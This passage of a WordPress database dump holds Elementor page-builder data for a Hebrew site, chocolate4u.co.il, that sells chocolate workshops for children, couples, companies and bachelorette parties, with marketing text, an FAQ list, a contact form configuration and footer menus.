\\u05ea\\u05d2\\u05d9\\u05d3\\u05d5 \\u05d5\\u05d4\\u05dd \\u05d9\\u05e7\\u05d1\\u05dc\\u05d5 \\u05d0\\u05ea \\u05d4\\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05d4\\u05de\\u05dc\\u05d0\\u05d4 \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8 \\u05e9\\u05d4\\u05d9\\u05d9\\u05ea\\u05d4 \\u05dc\\u05d4\\u05dd \\u05d0\\u05d9 \\u05e4\\u05e2\\u05dd \\u05d1\\u05d7\\u05d9\\u05d9\\u05d4\\u05dd \\u05d4\\u05e7\\u05d8\\u05e0\\u05d9\\u05dd \\u05dc\\u05d3\\u05d1\\u05e8 \\u05e9\\u05d4\\u05dd \\u05d4\\u05db\\u05d9 \\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd - \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3!<\\/p><p>\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d4 \\u05de\\u05d0\\u05d6 \\u05d5\\u05de\\u05ea\\u05de\\u05d9\\u05d3 \\u05d4\\u05d9\\u05d4 \\u05d4\\u05de\\u05d0\\u05db\\u05dc \\u05e9\\u05e7\\u05d9\\u05e8\\u05d1 \\u05d1\\u05d9\\u05df \\u05d4\\u05dc\\u05d1\\u05d1\\u05d5\\u05ea \\u05e9\\u05dc \\u05d4\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd, \\u05ea\\u05e6\\u05d9\\u05e2\\u05d5 \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05d5\\u05d4\\u05dd \\u05ea\\u05de\\u05d9\\u05d3 \\u05d9\\u05d4\\u05d9\\u05d5 \\u05e7\\u05e9\\u05d5\\u05d1\\u05d9\\u05dd \\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05d0\\u05e9\\u05e8 \\u05e9\\u05ea\\u05e6\\u05d9\\u05e2\\u05d5 \\u05dc\\u05d4\\u05dd \\u05d0\\u05ea \\u05d4\\u05e9\\u05e0\\u05d9\\u05e6\\u05dc \\u05e9\\u05d4\\u05d9\\u05d4 \\u05d1\\u05de\\u05d8\\u05d1\\u05d7 \\u05db\\u05dc \\u05d4\\u05d9\\u05d5\\u05dd. \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5 \\u05d4\\u05d0\\u05d4\\u05d1\\u05d4 \\u05e9\\u05dc \\u05db\\u05d5\\u05dc\\u05e0\\u05d5, \\u05dc\\u05d0 \\u05e8\\u05e7 \\u05e9\\u05dc \\u05d4\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd, \\u05d0\\u05dc \\u05ea\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05d0\\u05ea \\u05d4\\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05d4\\u05d6\\u05d5 \\u05e8\\u05d9\\u05e7\\u05d4 \\u05de\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd \\u05db\\u05d9 \\u05d2\\u05dd \\u05d0\\u05ea\\u05dd \\u05ea\\u05d9\\u05d4\\u05e0\\u05d5 \\u05d1\\u05e8\\u05de\\u05d5\\u05ea \\u05d4\\u05d2\\u05d1\\u05d5\\u05d4\\u05d5\\u05ea \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3, \\u05d5\\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05db\\u05e9\\u05de\\u05d3\\u05d5\\u05d1\\u05e8 \\u05d1\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05d5\\u05d1\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd. \\u05ea\\u05db\\u05d9\\u05e0\\u05d5 \\u05d0\\u05ea \\u05e2\\u05e6\\u05de\\u05db\\u05dd, \\u05dc\\u05d0 \\u05de\\u05e2\\u05d8 \\u05d4\\u05d5\\u05e8\\u05d9\\u05dd \\u05de\\u05e2\\u05d9\\u05d3\\u05d9\\u05dd \\u05e2\\u05dc \\u05db\\u05da \\u05e9\\u05e0\\u05d4\\u05e0\\u05d5 \\u05d4\\u05e8\\u05d1\\u05d4 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05d0\\u05e9\\u05e8 \\u05d4\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05e9\\u05dc\\u05d4\\u05dd \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd.<\\/p><p><strong>\\u05db\\u05df, \\u05d2\\u05dd \\u05d0\\u05dd \\u05d6\\u05d4 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd, \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d4 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05e2\\u05db\\u05e9\\u05d9\\u05d5 \\u05db\\u05dc \\u05de\\u05d4 \\u05e9\\u05e0\\u05e9\\u05d0\\u05e8 \\u05dc\\u05db\\u05dd, \\u05d6\\u05d4 \\u05dc\\u05e7\\u05d1\\u05d5\\u05e2 \\u05d5\\u05dc\\u05d8\\u05e2\\u05d5\\u05dd \\u05d9\\u05d7\\u05d3 \\u05d0\\u05d9\\u05ea\\u05e0\\u05d5.\\u00a0<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"b495af6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>\\u05de\\u05d4 \\u05e2\\u05d5\\u05d3 \\u05d0\\u05e0\\u05d7\\u05e0\\u05d5 \\u05e2\\u05d5\\u05e9\\u05d9\\u05dd?<\\/h3><ul><li><span style=\\\"text-decoration: underline;\\\"><a href=\\\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%96%D7%95%D7%92%D7%99%D7%AA\\/\\\">\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea<\\/a><\\/span><u><\\/u><\\/li><li><u><a href=\\\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%97%D7%91%D7%A8%D7%95%D7%AA\\/\\\">\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d5\\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd<\\/a><\\/u><\\/li><li><u><a href=\\\"https:\\/\\/www.chocolate4u.co.il\\/%d7%a1%d7%93%d7%a0%d7%aa-%d7%a9%d7%95%d7%a7%d7%95%d7%9c%d7%93-%d7%9c%d7%9e%d7%a1%d7%99%d7%91%d7%aa-%d7%a8%d7%95%d7%95%d7%a7%d7%95%d7%aa\\/\\\">\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea<\\/a><\\/u><\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"40986278\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":30},\"elements\":[{\"id\":\"69a8df27\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d9\\u05e6\\u05d9\\u05e8\\u05ea \\u05e7\\u05e9\\u05e8 \\u05de\\u05d4\\u05d9\\u05e8\\u05d4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6999b663\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"name\",\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"true\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"name\",\"recaptcha_badge\":\"bottomright\"},{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\",\"recaptcha_badge\":\"bottomright\"},{\"field_type\":\"tel\",\"field_label\":\"\\u05d8\\u05dc\'\",\"field_value\":\"\",\"placeholder\":\"\\u05d8\\u05dc\'\",\"required\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width\":\"100\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"_id\":\"field_1\",\"custom_id\":\"field_1\",\"recaptcha_badge\":\"bottomright\"}],\"input_size\":\"md\",\"show_labels\":\"\",\"button_text\":\"\\u05e9\\u05dc\\u05d7\\u05d5 \\u05e4\\u05e8\\u05d8\\u05d9\\u05dd\",\"button_icon\":\"fa fa-envelope\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"submit_actions\":[\"email\",\"webhook\"],\"webhooks\":\"https:\\/\\/api.leadmanager.co.il\\/handlers\\/lm\\/submit.cms?lm_form=34779&lm_key=ec25004589054b7cb52f27a1c66716ff\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3ea5b73c\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"17ab813e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"37c615a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e9\\u05d0\\u05dc\\u05d5\\u05ea \\u05e9\\u05ea\\u05de\\u05d9\\u05d3 \\u05e0\\u05e9\\u05d0\\u05dc\\u05d5\\u05ea:\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7559efb1\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05db\\u05df, \\u05d0\\u05e4\\u05e9\\u05e8 \\u05d2\\u05dd \\u05d1\\u05d1\\u05d9\\u05ea (\\u05d1\\u05d8\\u05d7 \\u05ea\\u05e8\\u05e6\\u05d5 \\u05e1\\u05d1\\u05d9\\u05d1\\u05d4 \\u05d8\\u05d1\\u05e2\\u05d9\\u05ea)\",\"icon\":\"fa fa-check\",\"_id\":\"00c967d\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"},\"selected_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"}},{\"text\":\"\\u05db\\u05dc \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d9\\u05db\\u05d5\\u05dc\\u05d4 \\u05dc\\u05d4\\u05d9\\u05d5\\u05ea \\u05e2\\u05d3 \\u05db4 \\u05e9\\u05e2\\u05d5\\u05ea\",\"icon\":\"fa fa-check\",\"_id\":\"dad4d48\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"},\"selected_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"}},{\"text\":\"\\u05db\\u05de\\u05d5\\u05d1\\u05df \\u05e9\\u05d0\\u05e0\\u05d7\\u05e0\\u05d5 \\u05de\\u05d1\\u05d9\\u05d0\\u05d9\\u05dd \\u05d0\\u05ea \\u05d4\\u05de\\u05e6\\u05e8\\u05db\\u05d9\\u05dd \\u05d5\\u05d2\\u05dd \\u05d0\\u05ea \\u05d4\\u05e1\\u05d9\\u05e0\\u05e8\\u05d9\\u05dd \\u05dc\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd\",\"icon\":\"fa fa-check\",\"_id\":\"1ecee46\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"},\"selected_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"}},{\"text\":\"\\u05db\\u05df, \\u05d4\\u05dd \\u05dc\\u05d0 \\u05e8\\u05e7 \\u05d9\\u05d0\\u05db\\u05dc\\u05d5, \\u05d4\\u05dd \\u05d2\\u05dd \\u05d9\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05dc\\u05e2\\u05e6\\u05de\\u05dd \\u05dc\\u05de\\u05d7\\u05e8 \\u05de\\u05d4 \\u05e9\\u05d9\\u05d9\\u05e9\\u05d0\\u05e8\",\"icon\":\"fa fa-check\",\"_id\":\"fc43a28\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"},\"selected_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"}},{\"text\":\"\\u05d0\\u05dd \\u05d9\\u05e9 \\u05dc\\u05db\\u05dd \\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05d9\\u05dc\\u05d3 \\u05d0\\u05d7\\u05d3, \\u05d6\\u05d4 \\u05d1\\u05e1\\u05d3\\u05e8 \\u05d2\\u05de\\u05d5\\u05e8, \\u05db\\u05de\\u05d4 \\u05e9\\u05ea\\u05e8\\u05e6\\u05d5 - \\u05d9\\u05e9\\u05ea\\u05ea\\u05e4\\u05d5\",\"icon\":\"fa fa-check\",\"_id\":\"3135133\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"},\"selected_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"}}],\"icon_align\":\"right\",\"icon_size\":{\"unit\":\"px\",\"size\":18},\"text_indent\":{\"unit\":\"px\",\"size\":10},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":21},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":1.8}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false},{\"id\":\"694d95f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"3e053522\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/logoup.png\",\"id\":33}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(1880,377,'_elementor_version','2.7.5'),(1881,377,'_elementor_template_type','wp-post'),(1882,377,'_elementor_pro_version','2.7.3'),(1883,377,'_elementor_controls_usage','a:8:{s:11:\"breadcrumbs\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:3;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:27:\"section_breadcrumbs_content\";a:1:{s:5:\"align\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:6:{s:21:\"typography_typography\";i:1;s:22:\"typography_font_family\";i:1;s:20:\"typography_font_size\";i:1;s:22:\"typography_font_weight\";i:1;s:26:\"typography_text_decoration\";i:1;s:10:\"text_color\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:5;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:6:\"layout\";a:1:{s:12:\"_inline_size\";i:4;}}}}s:7:\"section\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:6:\"layout\";a:2:{s:14:\"section_layout\";a:1:{s:15:\"stretch_section\";i:1;}s:17:\"section_structure\";a:1:{s:9:\"structure\";i:2;}}s:5:\"style\";a:1:{s:18:\"section_background\";a:2:{s:21:\"background_background\";i:2;s:16:\"background_color\";i:2;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:13:\"section_title\";a:2:{s:5:\"title\";i:3;s:11:\"header_size\";i:1;}}}}s:5:\"image\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:13:\"section_image\";a:2:{s:5:\"image\";i:2;s:10:\"image_size\";i:1;}}}}s:11:\"text-editor\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:2;}}}}s:4:\"form\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:4;s:8:\"controls\";a:1:{s:7:\"content\";a:7:{s:19:\"section_form_fields\";a:4:{s:9:\"form_name\";i:1;s:11:\"form_fields\";i:1;s:10:\"input_size\";i:1;s:11:\"show_labels\";i:1;}s:21:\"section_submit_button\";a:1:{s:11:\"button_text\";i:1;}s:13:\"section_email\";a:3:{s:13:\"email_subject\";i:1;s:10:\"email_from\";i:1;s:15:\"email_from_name\";i:1;}s:15:\"section_email_2\";a:3:{s:15:\"email_subject_2\";i:1;s:12:\"email_from_2\";i:1;s:17:\"email_from_name_2\";i:1;}s:20:\"section_form_options\";a:4:{s:15:\"success_message\";i:1;s:13:\"error_message\";i:1;s:22:\"required_field_message\";i:1;s:15:\"invalid_message\";i:1;}s:19:\"section_integration\";a:1:{s:14:\"submit_actions\";i:1;}s:15:\"section_webhook\";a:1:{s:8:\"webhooks\";i:1;}}}}s:9:\"icon-list\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:3;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:12:\"section_icon\";a:1:{s:9:\"icon_list\";i:1;}}s:5:\"style\";a:3:{s:17:\"section_icon_list\";a:1:{s:10:\"icon_align\";i:1;}s:18:\"section_icon_style\";a:1:{s:9:\"icon_size\";i:1;}s:18:\"section_text_style\";a:4:{s:11:\"text_indent\";i:1;s:26:\"icon_typography_typography\";i:1;s:25:\"icon_typography_font_size\";i:1;s:27:\"icon_typography_line_height\";i:1;}}}}}'),(1885,378,'_wp_page_template','elementor_header_footer'),(1886,378,'_elementor_edit_mode','builder'),(1887,378,'_elementor_data','[{\"id\":\"4a34667\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f9f9337\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"972ca81\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d4\\u05de\\u05d2\\u05d6\\u05d9\\u05df \\u05d4\\u05d8\\u05e2\\u05d9\\u05dd \\u05e9\\u05dc \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e467453\",\"elType\":\"widget\",\"settings\":{\"weight\":{\"unit\":\"px\",\"size\":4},\"width\":{\"unit\":\"%\",\"size\":42},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"bc8044c\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"cards\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_show_excerpt\":\"\",\"cards_meta_data\":[],\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"\\u05dc\\u05e7\\u05e8\\u05d9\\u05d0\\u05d4 \\u00bb\",\"cards_show_avatar\":\"\",\"offset\":\"\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\"},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"595c4b79\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"background_background\":\"gradient\",\"background_color\":\"#575860\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"15\",\"bottom\":\"20\",\"left\":\"15\",\"isLinked\":false},\"background_color_b\":\"#3a3a3a\",\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":360},\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"55a018\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"42ec654b\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"7032c8d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"68bbbdb2\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"262a9cad\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"icon\":\"\",\"_id\":\"7a91d3f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"ad388f0\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d5\\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"9dc0267\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"1c80b63c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"269f0e2a\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e7\\u05d5\\u05e8\\u05e1\\u05d9\\u05dd \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7d91b4cb\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d8\\u05d9\\u05d9\\u05e8\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a70e4bf\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05ea\\u05d7\\u05d9\\u05dc\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"30a3b9f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"50ee25e1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":49.999,\"_inline_size_tablet\":100,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true}},\"elements\":[{\"id\":\"7235e8ee\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 